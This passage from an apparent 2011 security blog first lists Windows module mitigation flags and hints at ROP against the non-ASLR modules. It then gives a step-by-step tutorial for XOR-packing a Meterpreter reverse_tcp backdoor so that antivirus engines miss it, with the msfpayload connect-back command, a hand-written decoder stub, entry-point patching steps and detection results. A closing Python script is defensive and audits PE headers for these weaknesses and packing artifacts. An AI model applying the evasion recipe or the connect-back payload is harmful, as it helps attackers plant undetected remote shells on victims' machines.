0BADF00D      yes   | 0x043F0000 | 0x04406000 | 0x00016000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - thumbcache.dll : C:\Windows\system32\thumbcache.dll
0BADF00D      yes   | 0x73E70000 | 0x7400E000 | 0x0019E000 |   yes   |  yes  |    yes   |   yes  | 6.10 - comctl32.dll : C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll
0BADF00D      yes   | 0x73E50000 | 0x73E60000 | 0x00010000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - Syncreg.dll : C:\Windows\system32\Syncreg.dll
0BADF00D      yes   | 0x6C0B0000 | 0x6C328000 | 0x00278000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - gameux.dll : C:\Windows\System32\gameux.dll
0BADF00D      yes   | 0x759F0000 | 0x75ABC000 | 0x000CC000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - MSCTF.dll : C:\Windows\system32\MSCTF.dll
0BADF00D      yes   | 0x65D40000 | 0x65EEE000 | 0x001AE000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - pnidui.dll : C:\Windows\System32\pnidui.dll
0BADF00D      yes   | 0x73270000 | 0x73280000 | 0x00010000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - nlaapi.dll : C:\Windows\System32\nlaapi.dll
0BADF00D      yes   | 0x74F40000 | 0x74F4E000 | 0x0000E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - RpcRtRemote.dll : C:\Windows\system32\RpcRtRemote.dll
0BADF00D      yes   | 0x753C0000 | 0x7540E000 | 0x0004E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - GDI32.dll : C:\Windows\system32\GDI32.dll
0BADF00D      yes   | 0x74750000 | 0x7475E000 | 0x0000E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - DEVRTL.dll : C:\Windows\system32\DEVRTL.dll
0BADF00D      yes   | 0x721B0000 | 0x721D5000 | 0x00025000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - cscobj.dll : C:\Windows\System32\cscobj.dll
0BADF00D      yes   | 0x71F40000 | 0x71F8D000 | 0x0004D000 |   yes   |  yes  |    yes   |   yes  | 7.00.7600.16385 - srchadmin.dll : C:\Windows\System32\srchadmin.dll
0BADF00D      yes   | 0x6D7E0000 | 0x6D82F000 | 0x0004F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - hgcpl.dll : C:\Windows\System32\hgcpl.dll
0BADF00D      yes   | 0x6AF20000 | 0x6B160000 | 0x00240000 |   yes   |  yes  |    yes   |   yes  | 5.0.7600.16385 - msi.dll : C:\Windows\system32\msi.dll
0BADF00D      yes   | 0x75060000 | 0x7517C000 | 0x0011C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CRYPT32.dll : C:\Windows\system32\CRYPT32.dll
0BADF00D      yes   | 0x6E6E0000 | 0x6E84F000 | 0x0016F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - EXPLORERFRAME.dll : C:\Windows\system32\EXPLORERFRAME.dll
0BADF00D      yes   | 0x71CD0000 | 0x71D34000 | 0x00064000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - prnfldr.dll : C:\Windows\system32\prnfldr.dll
0BADF00D      yes   | 0x68BD0000 | 0x6964F000 | 0x00A7F000 |   yes   |  yes  |    yes   |   yes  | 8.00.7600.16385 - ieframe.dll : C:\Windows\System32\ieframe.dll
0BADF00D      yes   | 0x71A30000 | 0x71A3C000 | 0x0000C000 |   yes   |  yes  |    yes   |   yes  | 7.00.7600.16385 - mssprxy.dll : C:\Windows\system32\mssprxy.dll
0BADF00D      yes   | 0x74340000 | 0x7434D000 | 0x0000D000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WTSAPI32.dll : C:\Windows\system32\WTSAPI32.dll
0BADF00D      yes   | 0x6E240000 | 0x6E2CE000 | 0x0008E000 |   yes   |  yes  |    yes   |   yes  | 9.00.30729.4974 - MSVCP90.dll : C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCP90.dll
0BADF00D      yes   | 0x72480000 | 0x724A2000 | 0x00022000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - EhStorAPI.dll : C:\Windows\system32\EhStorAPI.dll
0BADF00D      yes   | 0x6C380000 | 0x6C3CE000 | 0x0004E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - actxprxy.dll : C:\Windows\system32\actxprxy.dll
0BADF00D      yes   | 0x723A0000 | 0x723F8000 | 0x00058000 |   yes   |  yes  |    yes   |   NO   | 6.1.7600.16385 - tiptsf.dll : C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
0BADF00D      yes   | 0x74570000 | 0x74587000 | 0x00017000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - USERENV.dll : C:\Windows\system32\USERENV.dll
0BADF00D      yes   | 0x749D0000 | 0x749E6000 | 0x00016000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CRYPTSP.dll : C:\Windows\system32\CRYPTSP.dll
0BADF00D      yes   | 0x6FA40000 | 0x6FA56000 | 0x00016000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - Wlanapi.dll : C:\Windows\system32\Wlanapi.dll
0BADF00D      yes   | 0x6BF40000 | 0x6BF7A000 | 0x0003A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - FXSAPI.dll : C:\Windows\system32\FXSAPI.dll
0BADF00D      NO    | 0x6EE60000 | 0x6EE8F000 | 0x0002F000 |   yes   |  NO   |    NO    |   NO   | 1.3.9 - libaprutil_tsvn.dll : C:\Program Files\TortoiseSVN\bin\libaprutil_tsvn.dll
0BADF00D      yes   | 0x71E00000 | 0x71E08000 | 0x00008000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - npmproxy.dll : C:\Windows\System32\npmproxy.dll
0BADF00D      yes   | 0x73990000 | 0x739BF000 | 0x0002F000 |   yes   |  yes  |    yes   |   yes  | 1.3.1000.0 - XmlLite.dll : C:\Windows\System32\XmlLite.dll
0BADF00D      yes   | 0x74E50000 | 0x74E9B000 | 0x0004B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - apphelp.dll : C:\Windows\system32\apphelp.dll
0BADF00D      yes   | 0x6C3E0000 | 0x6C44A000 | 0x0006A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - cscui.dll : C:\Windows\System32\cscui.dll
0BADF00D      yes   | 0x73760000 | 0x73769000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - netutils.dll : C:\Windows\system32\netutils.dll
0BADF00D      yes   | 0x71EC0000 | 0x71EE9000 | 0x00029000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - syncui.dll : C:\Windows\system32\syncui.dll
0BADF00D      yes   | 0x66EA0000 | 0x66F13000 | 0x00073000 |   yes   |  yes  |    yes   |   NO   | 1.0.2498.0 - shellext.dll : c:\PROGRA~1\MIF707~1\shellext.dll
0BADF00D      yes   | 0x73A70000 | 0x73A9F000 | 0x0002F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - DUser.dll : C:\Windows\system32\DUser.dll
0BADF00D      yes   | 0x75250000 | 0x75256000 | 0x00006000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - NSI.dll : C:\Windows\system32\NSI.dll
0BADF00D      yes   | 0x6BF80000 | 0x6BFAB000 | 0x0002B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - provsvc.dll : C:\Windows\System32\provsvc.dll
0BADF00D      yes   | 0x76BB0000 | 0x76BF5000 | 0x00045000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WLDAP32.dll : C:\Windows\system32\WLDAP32.dll
0BADF00D      yes   | 0x6C450000 | 0x6CCB4000 | 0x00864000 |   yes   |  yes  |    yes   |   NO   | 14.0.4761.1000 - GrooveIntlResource.dll : C:\PROGRA~1\MICROS~3\Office14\1033\GrooveIntlResource.dll
0BADF00D      yes   | 0x751E0000 | 0x7522A000 | 0x0004A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - KERNELBASE.dll : C:\Windows\system32\KERNELBASE.dll
0BADF00D      yes   | 0x74EB0000 | 0x74F0F000 | 0x0005F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SXS.DLL : C:\Windows\system32\SXS.DLL
0BADF00D      yes   | 0x6CCC0000 | 0x6D0CB000 | 0x0040B000 |   yes   |  yes  |    yes   |   NO   | 14.0.4761.1000 - GROOVEEX.DLL : C:\PROGRA~1\MICROS~3\Office14\GROOVEEX.DLL
0BADF00D      yes   | 0x71FF0000 | 0x72002000 | 0x00012000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wercplsupport.dll : C:\Windows\System32\wercplsupport.dll
0BADF00D      yes   | 0x70FA0000 | 0x70FA6000 | 0x00006000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wlanutil.dll : C:\Windows\system32\wlanutil.dll
0BADF00D      yes   | 0x72D90000 | 0x72D9D000 | 0x0000D000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - dhcpcsvc6.DLL : C:\Windows\system32\dhcpcsvc6.DLL
0BADF00D      yes   | 0x6BAD0000 | 0x6BB59000 | 0x00089000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - PortableDeviceApi.dll : C:\Windows\system32\PortableDeviceApi.dll
0BADF00D      yes   | 0x72DD0000 | 0x72F27000 | 0x00157000 |   yes   |  yes  |    yes   |   yes  | 6.30.7600.16385 - msxml6.dll : C:\Windows\System32\msxml6.dll
0BADF00D      yes   | 0x74410000 | 0x74419000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - VERSION.dll : C:\Windows\system32\VERSION.dll
0BADF00D      yes   | 0x76F60000 | 0x77000000 | 0x000A0000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ADVAPI32.dll : C:\Windows\system32\ADVAPI32.dll
0BADF00D      yes   | 0x75B80000 | 0x75D1D000 | 0x0019D000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SETUPAPI.dll : C:\Windows\system32\SETUPAPI.dll
0BADF00D      yes   | 0x759B0000 | 0x759E5000 | 0x00035000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WS2_32.dll : C:\Windows\system32\WS2_32.dll
0BADF00D      yes   | 0x73B60000 | 0x73CF0000 | 0x00190000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - gdiplus.dll : C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
0BADF00D      yes   | 0x69A80000 | 0x69B30000 | 0x000B0000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - bthprops.cpl : C:\Windows\System32\bthprops.cpl
0BADF00D      NO    | 0x6EEC0000 | 0x6EEE2000 | 0x00022000 |   yes   |  NO   |    NO    |   NO   | 1.3.8 - libapr_tsvn.dll : C:\Program Files\TortoiseSVN\bin\libapr_tsvn.dll
0BADF00D      yes   | 0x74DA0000 | 0x74DB9000 | 0x00019000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - srvcli.dll : C:\Windows\system32\srvcli.dll
0BADF00D      yes   | 0x71F90000 | 0x71FBD000 | 0x0002D000 |   yes   |  yes  |    yes   |   NO   | 3.91.2 - rarext.dll : C:\Program Files\WinRAR\rarext.dll
0BADF00D      yes   | 0x73690000 | 0x736C6000 | 0x00036000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - AUDIOSES.DLL : C:\Windows\system32\AUDIOSES.DLL
0BADF00D      yes   | 0x73AA0000 | 0x73B52000 | 0x000B2000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - DUI70.dll : C:\Windows\system32\DUI70.dll
0BADF00D      yes   | 0x6B550000 | 0x6B6E8000 | 0x00198000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - NetworkExplorer.dll : C:\Windows\system32\NetworkExplorer.dll
0BADF00D      yes   | 0x020A0000 | 0x0216A000 | 0x000CA000 |   yes   |  NO   |    NO    |   NO   | 1.6.11.20210 - TortoiseSVN.dll : C:\Program Files\TortoiseSVN\bin\TortoiseSVN.dll
0BADF00D      yes   | 0x734B0000 | 0x734D1000 | 0x00021000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ntmarta.dll : C:\Windows\system32\ntmarta.dll
0BADF00D      yes   | 0x04320000 | 0x04334000 | 0x00014000 |   NO    |  NO   |    NO    |   NO   | 4.65 - 7-zip.dll : C:\Program Files\7-Zip\7-zip.dll
0BADF00D      yes   | 0x75DB0000 | 0x75E5C000 | 0x000AC000 |   yes   |  yes  |    yes   |   yes  | 7.0.7600.16385 - msvcrt.dll : C:\Windows\system32\msvcrt.dll
0BADF00D      yes   | 0x73E60000 | 0x73E66000 | 0x00006000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - IconCodecService.dll : C:\Windows\system32\IconCodecService.dll
0BADF00D      yes   | 0x6AC60000 | 0x6AD1A000 | 0x000BA000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - Actioncenter.dll : C:\Windows\System32\Actioncenter.dll
0BADF00D      yes   | 0x75E60000 | 0x75EFD000 | 0x0009D000 |   yes   |  yes  |    yes   |   yes  | 1.0626.7600.16385 - USP10.dll : C:\Windows\system32\USP10.dll
0BADF00D      yes   | 0x74E10000 | 0x74E18000 | 0x00008000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - Secur32.dll : C:\Windows\system32\Secur32.dll
0BADF00D      yes   | 0x75230000 | 0x75242000 | 0x00012000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - DEVOBJ.dll : C:\Windows\system32\DEVOBJ.dll
0BADF00D      yes   | 0x6E540000 | 0x6E591000 | 0x00051000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WINSPOOL.DRV : C:\Windows\system32\WINSPOOL.DRV
0BADF00D      yes   | 0x71AA0000 | 0x71AE8000 | 0x00048000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wwanapi.dll : C:\Windows\system32\wwanapi.dll
0BADF00D      yes   | 0x6AD20000 | 0x6AE3A000 | 0x0011A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wscui.cpl : C:\Windows\System32\wscui.cpl
0BADF00D      yes   | 0x74770000 | 0x747AB000 | 0x0003B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - rsaenh.dll : C:\Windows\system32\rsaenh.dll
0BADF00D      yes   | 0x72510000 | 0x72775000 | 0x00265000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - netshell.dll : C:\Windows\System32\netshell.dll
0BADF00D      yes   | 0x73700000 | 0x7370E000 | 0x0000E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - AltTab.dll : C:\Windows\System32\AltTab.dll
0BADF00D      yes   | 0x75700000 | 0x7578F000 | 0x0008F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16567 - OLEAUT32.dll : C:\Windows\system32\OLEAUT32.dll
0BADF00D      yes   | 0x042D0000 | 0x042E7000 | 0x00017000 |   NO    |  NO   |    NO    |   NO   | 0.1 - NppShell_01.dll : C:\Program Files\Notepad++\NppShell_01.dll
0BADF00D      yes   | 0x75570000 | 0x75611000 | 0x000A1000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - RPCRT4.dll : C:\Windows\system32\RPCRT4.dll
0BADF00D      yes   | 0x72FC0000 | 0x72FD4000 | 0x00014000 |   yes   |  yes  |    yes   |   yes  | 3.05.2284 - ATL.DLL : C:\Windows\system32\ATL.DLL
0BADF00D      yes   | 0x73750000 | 0x7375F000 | 0x0000F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wkscli.dll : C:\Windows\system32\wkscli.dll
0BADF00D      yes   | 0x6E2F0000 | 0x6E34A000 | 0x0005A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - netprofm.dll : C:\Windows\System32\netprofm.dll
0BADF00D      yes   | 0x73530000 | 0x73568000 | 0x00038000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SndVolSSO.DLL : C:\Windows\system32\SndVolSSO.DLL
0BADF00D      yes   | 0x72380000 | 0x72397000 | 0x00017000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - QUtil.dll : C:\Windows\System32\QUtil.dll
0BADF00D      yes   | 0x74110000 | 0x742C7000 | 0x001B7000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - authui.dll : C:\Windows\system32\authui.dll
0BADF00D      yes   | 0x73E30000 | 0x73E42000 | 0x00012000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SAMLIB.dll : C:\Windows\system32\SAMLIB.dll
0BADF00D      yes   | 0x6AE40000 | 0x6AEAF000 | 0x0006F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ntshrui.dll : C:\Windows\system32\ntshrui.dll
0BADF00D      yes   | 0x76F50000 | 0x76F53000 | 0x00003000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - Normaliz.dll : C:\Windows\system32\Normaliz.dll
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------

Also interesting, and I hadn't noticed it before: the TortoiseSVN extensions, 7-Zip and Notepad++ are loaded with no ASLR enabled. ROP, anyone? :)

Saturday, January 15, 2011

meterpreter xor for further av bypass

Still on holidays here, and in between sake, beer and shochu I found some time to read and check a few things I had wanted to do for a while. One of them was how to implement a simple binary XOR in an .exe file, specifically for Meterpreter. Meterpreter is a great tool, but it is detected by antivirus engines, which makes it difficult to use as a standard payload.

A simple way to create a Meterpreter binary that connects back to 192.168.11.7:

C:\framework\msf3>ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.11.7 R | ruby msfencode -t exe -o meter_rever_tcp_192.exe -e x86/shikata_ga_nai -c 2
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

C:\framework\msf3>


VirusTotal result for the binary: 15/37 (40.5%), hash 0f5298c9572ed0db233b2632aa6068a7

With the following av engines detecting the binary:

Antivirus          Version          Last Update   Result
AhnLab-V3          2011.01.15.00    2011.01.14    Trojan/Win32.Shell
AntiVir            7.11.1.144       2011.01.14    TR/Crypt.EPACK.Gen2
BitDefender        7.2              2011.01.15    Backdoor.Shell.AC
Command            5.2.11.5         2011.01.14    W32/Swrort.A.gen!Eldorado
eTrust-Vet         36.1.8100        2011.01.14    Win32/Swrort.A!generic
F-Prot             4.6.2.117        2011.01.14    W32/Swrort.A.gen!Eldorado
GData              21               2011.01.15    Backdoor.Shell.AC
K7AntiVirus        9.75.3548        2011.01.14    Riskware
Microsoft          1.6402           2011.01.14    Trojan:Win32/Swrort.A
NOD32              5788             2011.01.14    a variant of Win32/Rozena.AA
nProtect           2011-01-14.01    2011.01.14    Backdoor.Shell.AC
Panda              10.0.2.7         2011.01.14    Suspicious file
Sophos             4.61.0           2011.01.14    Mal/Swrort-C
SUPERAntiSpyware   4.40.0.1006      2011.01.15    Trojan.Backdoor-PoisonIvy
VirusBuster        13.6.147.0       2011.01.14    Trojan.Rosena.Gen.1

Manual packing of the binary can be done in many ways; the simplest is to XOR the data of the binary file. The process is easy: you only have to do it once and see it working, and from there one can replace the XOR with different, more complicated methods to get better results.

Two tools will be used for the process: OllyDbg ( http://www.ollydbg.de/ ) and LordPE ( http://www.woodmann.com/collaborative/tools/index.php/LordPE ).

To start, we fire up OllyDbg and load our binary file.

Some things to observe here: the OEP (original entry point) of the executable module is at 00406D42. Also, looking near the end of the file, we need to find a place for the new instructions. We are looking for a run of DB 00 bytes; at least 10 lines will do the job, and if you don't have the space you can always add it with a hex editor.

For the binary file I'm using, a place around 0040BF60 looks suitable for the extra code. The instructions will be:

mov ecx, "address of our code" - "original entry point"
mov eax, "original entry point"
xor byte [eax], 0A <- here the 0A acts as an encryption key and can be anything that you like
inc eax
dec ecx
jnz "our xor address"
push "original entry point"
retn 

For the binary file I'm working with, the instructions are exactly as follows:
mov ecx, 521E
mov eax, 00406D42
xor byte [eax], 0A
inc eax
dec ecx
jnz 0040bf6a
push 00406D42
retn

To save the modifications, right click, select Copy to executable, All modifications.


Choose Copy all again in the next dialog box. Finally, right click in the new window and choose Save file.

Enter a new filename and we are done with OllyDbg for the moment. The next step is to make our file execute our code before anything else. To achieve this we need to change the OEP (original entry point) to the first address of our instruction set (for my file the address is 0040BF60).

LordPE will help us make this change. All we actually need to do is calculate the new entry point from the image base and the address of our code. Loading LordPE, we choose PE Editor and select our newly created file.

Originally the entry point is at 6D42 with our image base at 00400000 (the OEP when loading the file in OllyDbg was at 00406D42).

We need the OEP to be at 0040BF60, so the new entry point is the address minus the image base ( 0040BF60 - 00400000 = BF60 ).
After changing the EntryPoint we click Save, OK, and close LordPE.

Back in OllyDbg we load the new file and can see that the program now starts at our first instruction.
We now need to place a breakpoint on the retn instruction.

By doing that we tell the debugger to stop execution at the retn instruction when the program runs. We do this because all we need is for our XOR loop to run from the top of the actual code up to the start of our stub and XOR every byte of data with the selected key; we don't actually want to run the program. After placing the breakpoint we hit Run (or press F9) once.
If we look at the code above we will see that it has now changed. Now we need to select the modified code and save it as a new file, so the selection covers the range between the original OEP (00406D42) and our new OEP (0040BF60).

Right click, select Copy to executable, Selection, then right click in the new window and save the file under a new name.

Finally we have our new XORed file.

Using this simple technique only 2 antivirus engines were bypassed and no longer detect Meterpreter as a virus: VirusBuster and eTrust-Vet.

More results will follow with different methods of binary encryption/packing. A final note for this test: OllyDbg may log an access violation during the XOR loop. This is because the .text section of the PE file is usually marked executable and readable only, so we need to make the section writable as well. To do that, load the file in LordPE, from PE Editor choose Sections, right click the .text section, Flags..., and make sure the Writable option is set.
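Both posts come down to reading PE headers: the module list in the first post is pvefindaddr reporting per-module Rebase/SafeSEH/ASLR/NXCompat state, and the packing walkthrough above ends by having to mark .text writable and moving the entry point into zero padding, which are exactly the kind of header anomalies a reviewer or scanner can look for. The following script is an added example, not code from either post, from pvefindaddr or from OllyDbg/LordPE. It parses a PE32 image with nothing but the standard library, derives the four pvefindaddr columns from DllCharacteristics, the COFF characteristics and the load-config SEHandler fields, and flags the two packing artifacts (a section that is both executable and writable, and an entry point outside the VirtualSize of a code section). The images it audits are constructed in memory by build_sample(); the section layout, the 0x400000 image base and the SEHandler values there are made up for the test and are not taken from any real binary.

```python
# Static PE32 audit, added example (not the post's own code, nor pvefindaddr's). Reads the
# mitigation state pvefindaddr reports (Rebase, SafeSEH, ASLR, NXCompat) and flags a writable
# code section and an entry point moved into zero padding. Images are constructed inline.
import struct

DYNAMIC_BASE, NX_COMPAT = 0x0040, 0x0100   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE / _NX_COMPAT
RELOCS_STRIPPED = 0x0001                    # IMAGE_FILE_RELOCS_STRIPPED: loader cannot rebase it
SCN_CODE, SCN_EXEC, SCN_READ, SCN_WRITE = 0x20, 0x20000000, 0x40000000, 0x80000000
LOAD_CONFIG_DIR = 10                        # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG

def parse_pe(data):
    """Extract the header fields the audit needs from a PE32 (32-bit) file image."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size, file_chars = struct.unpack_from("<HH", data, coff + 16)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 images are handled in this example")
    entry = struct.unpack_from("<I", data, opt + 16)[0]       # AddressOfEntryPoint (RVA)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # DllCharacteristics
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]       # NumberOfRvaAndSizes
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode(), "vsize": f[1], "va": f[2],
                         "rawsize": f[3], "raw": f[4], "flags": f[9]})
    return {"entry": entry, "file_chars": file_chars, "dll_chars": dll_chars,
            "dirs": dirs, "sections": sections}

def section_for_rva(pe, rva):
    # mapped range is the larger of VirtualSize and SizeOfRawData (file slack gets mapped too)
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None

def audit(data):
    pe = parse_pe(data)
    rebase = not pe["file_chars"] & RELOCS_STRIPPED
    report = {
        "rebase": rebase,
        "aslr": rebase and bool(pe["dll_chars"] & DYNAMIC_BASE),  # the opt-in needs relocations
        "nxcompat": bool(pe["dll_chars"] & NX_COMPAT),
        "safeseh": False,
        "wx_sections": [s["name"] for s in pe["sections"]
                        if s["flags"] & SCN_EXEC and s["flags"] & SCN_WRITE],
        "entry_rva": pe["entry"],
        "entry_in_code": False,
    }
    # SafeSEH: a load-config block with SEHandlerTable (+0x40) and SEHandlerCount (+0x44) populated
    if len(pe["dirs"]) > LOAD_CONFIG_DIR and pe["dirs"][LOAD_CONFIG_DIR][0]:
        rva = pe["dirs"][LOAD_CONFIG_DIR][0]
        sec = section_for_rva(pe, rva)
        if sec is not None:
            table, count = struct.unpack_from("<II", data, sec["raw"] + rva - sec["va"] + 0x40)
            report["safeseh"] = table != 0 and count > 0
    # A normal entry point lies within the VirtualSize of a section flagged as code, not in the
    # DB 00 slack between VirtualSize and SizeOfRawData where a hand-written stub gets dropped.
    sec = section_for_rva(pe, pe["entry"])
    if sec is not None and sec["flags"] & SCN_CODE and pe["entry"] < sec["va"] + sec["vsize"]:
        report["entry_in_code"] = True
    return report

def build_sample(dll_chars, text_flags, entry_rva, relocs_stripped=False, load_config=True):
    """Constructed PE32 image (test data): headers, .text = 0x100 code + 0x100 zero bytes, .data."""
    hdr = bytearray(0x200)
    hdr[0:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                                      # e_lfanew
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 2, 0, 0, 0, 0xE0,            # COFF header
                     RELOCS_STRIPPED if relocs_stripped else 0)
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                                      # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, entry_rva)
    struct.pack_into("<I", hdr, opt + 28, 0x400000)                              # ImageBase (made up)
    struct.pack_into("<II", hdr, opt + 32, 0x1000, 0x200)                        # section / file alignment
    struct.pack_into("<II", hdr, opt + 56, 0x3000, 0x200)                        # SizeOfImage, SizeOfHeaders
    struct.pack_into("<HH", hdr, opt + 68, 2, dll_chars)                         # Subsystem, DllCharacteristics
    struct.pack_into("<I", hdr, opt + 92, 16)                                    # NumberOfRvaAndSizes
    if load_config:
        struct.pack_into("<II", hdr, opt + 96 + 8 * LOAD_CONFIG_DIR, 0x2000, 0x48)
    sec = opt + 0xE0
    struct.pack_into("<8sIIIIIIHHI", hdr, sec, b".text", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0, text_flags)
    struct.pack_into("<8sIIIIIIHHI", hdr, sec + 40, b".data", 0x100, 0x2000, 0x200, 0x400, 0, 0, 0, 0,
                     0x40 | SCN_READ | SCN_WRITE)
    data = bytearray(0x200)
    struct.pack_into("<II", data, 0x40, 0x2100, 3)                               # SEHandlerTable, SEHandlerCount
    return bytes(hdr) + b"\xCC" * 0x100 + b"\x00" * 0x100 + bytes(data)

def audit_samples():
    """Hardened build, a build like the non-ASLR shell extensions above, and a patched one."""
    code = SCN_CODE | SCN_EXEC | SCN_READ
    return {
        "hardened": audit(build_sample(DYNAMIC_BASE | NX_COMPAT, code, 0x1000)),
        "legacy": audit(build_sample(0, code, 0x1000, relocs_stripped=True, load_config=False)),
        "patched": audit(build_sample(DYNAMIC_BASE | NX_COMPAT, code | SCN_WRITE, 0x1180)),
    }
```

To audit a real module, pass its bytes to audit() (for example audit(open(path, "rb").read())); audit_samples() runs the three constructed cases. The "legacy" image comes out with every column false, like the 7-zip.dll and NppShell_01.dll rows in the module list, and the "patched" image is reported with a writable .text section and an entry point that is not inside the code bytes, which is what the LordPE flag change and the new OEP in the walkthrough produce. Note that ASLR is reported only when the DYNAMIC_BASE opt-in is combined with a relocation table, since a module without relocations cannot be moved even if the flag is set.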